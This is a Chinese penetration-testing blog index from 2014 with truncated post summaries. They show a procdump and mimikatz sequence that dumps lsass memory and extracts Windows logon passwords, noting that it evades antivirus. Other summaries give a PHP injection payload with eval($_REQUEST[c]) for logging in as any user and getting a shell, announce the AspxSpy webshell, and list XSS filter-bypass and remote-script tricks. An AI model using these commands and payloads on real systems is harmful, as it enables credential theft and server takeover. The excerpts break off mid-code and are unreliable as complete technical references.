摘要: url_rewrite 这个问题 国内外的坛子里都有人问。D:\cygwin\pentest\database\sqlmap\doc \faq.pdf下面是官方给的解答。1.15 How to use sqlmap with mod_rewrite enabled?Append an asterisk, *, to the place where sqlmap should check for injections inURI itself. For example, ./sqlmap.py -u "http://target.tld/id1/1*/id2/2",sqlma 阅读全文
posted @ 2014-03-01 23:47 Hookjoy 阅读(720) 评论(0) 推荐(0) 编辑
摘要: author: bin与include的区别,它可以动态包含文件。被包含文件里面可执行ASP代码,在国外的源码中有使用的。include.asp?file=./1.txt1.txt 阅读全文
posted @ 2014-02-28 20:01 Hookjoy 阅读(466) 评论(0) 推荐(0) 编辑
摘要: "; if( strpos($decode,'eval(gzinflate(base64_decode') !== false ) { preg_match("/(?'.$decode.''); }} 阅读全文
posted @ 2014-02-28 09:55 Hookjoy 阅读(1000) 评论(0) 推荐(0) 编辑
摘要: 使用procdump,由于是微软的东西,带微软签名杀软不会报毒。procdump -accepteula -ma lsass.exe lsass.dmpcopy出 lsass.dmp到本机。mimikatz # sekurlsa::minidump lsass.dmpSwitch to MINIDUMPmimikatz # sekurlsa::logonPasswords具体可以参考原文:http://blog.gentilkiwi.com/securite/mimikatz/minidump 阅读全文
posted @ 2014-02-27 19:54 Hookjoy 阅读(493) 评论(0) 推荐(0) 编辑
摘要: “Safe3 Web Application Firewall"是国内安全组织保护伞网络基于新一代Web安全技术开发的全方位企业Web信息安全产品。能有效扫描各种WebShell,同时也可以抵御各种Web攻击。运行环境:该软件能运行在 Windows 2000/2003/2008 下,支持 IIS5/IIS6/IIS7.x/IIS8.x软件需要系统安装.net framework 2.0,http://www.crsky.com/soft/4818.html软件主要功能:流量控制:当前网络P2P软件泛滥成灾,多线程下载(如迅雷等)造成网站仅有的带宽资源严重枯竭,不仅影响了网站的正常浏 阅读全文
posted @ 2014-02-27 17:09 Hookjoy 阅读(265) 评论(0) 推荐(0) 编辑
摘要: 0x00 起因这期 XSS 挑战的起因是在阅读“Modern Web Application Firewalls Fingerprinting and Bypassing XSS Filters”过后,在其中发现了一个很有趣的话题。那就是在圆括号被过滤的情况下,如何去执行javascript。在文中笔者给出来了这样的解决方 案:这是一个通过抛出异常的方式来执行 alert()的方案。那么,还有没有别的办法可以让我们在没有圆括号的情况下执行Javascript呢?众神们经常说,没有具体环境的讨论是没有意义 的。所以我就花了一点时间,编写了一个基于黑名单的XSS防御代码。也就有了我们这次的挑战。0 阅读全文
posted @ 2014-02-18 13:07 Hookjoy 阅读(917) 评论(0) 推荐(0) 编辑
摘要: https://sb\');eval(\$_REQUEST[c]);#').'"';#登录任意用户直接访问url即可,getshell可以curl或者用其他工具post提交function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) { $ckey_length = 4; $key = md5($key); $keya = md5(substr($key, 0, 16)); $keyb = md5(substr($key, 16, 16 阅读全文
posted @ 2014-02-18 12:52 Hookjoy 阅读(1047) 评论(0) 推荐(0) 编辑
摘要: “> 阅读全文
posted @ 2014-02-05 22:38 Hookjoy 阅读(9055) 评论(0) 推荐(1) 编辑
摘要: 受bin牛委托修改并发布,版权归bin牛所有。Bug/建议提交:zcgonvh@rootkit.net.cn祝各位马年大吉,财源滚滚。免责声明:本程序只用于管理员安全检测,使用前请注意环境与法律法规,因使用不当造成的后果本人不承担任何责任。已测试的系统:win2003+iis6+.net 2.0win2008+iis7+.net 4.0win8+iis8+.net 4.5注意:此版本最低需要.net 2.0环境,不再支持.net 1.1。如果目标机器是.net 1.1,请换用AspxSpy2010。 由于js问题,建议使用ie8+/ff等浏览器访问,win2003自带的ie6在多个功能页面会. 阅读全文
posted @ 2014-01-30 17:48 Hookjoy 阅读(864) 评论(0) 推荐(0) 编辑
摘要: 在早期 , 对于xss我们是这样利用的将 cookie之类的数据传递到自己的服务端但是 如果要更为复杂的攻击的话,由于字符串长度等限制 需要加载远程js来实现。一个简单的例子这样更为简洁src属性会自己取当前页面的协议。过滤了 的话 有时候可以用 %bf u003cu 等来绕过。对于可以执行js的属性,我们可以控制其内容的话,可以基于DOM的方法创建和插入节点调用js不要忘记 autofocus无须交互即可执行js。过滤了 script ‘ create 等关键字的话。 各种编码绕过即可。 你可以看下jin的这篇文章http://drops.wooyun.org/tips/689或者用Stri 阅读全文
posted @ 2014-01-26 23:26 Hookjoy 阅读(1289) 评论(0) 推荐(0) 编辑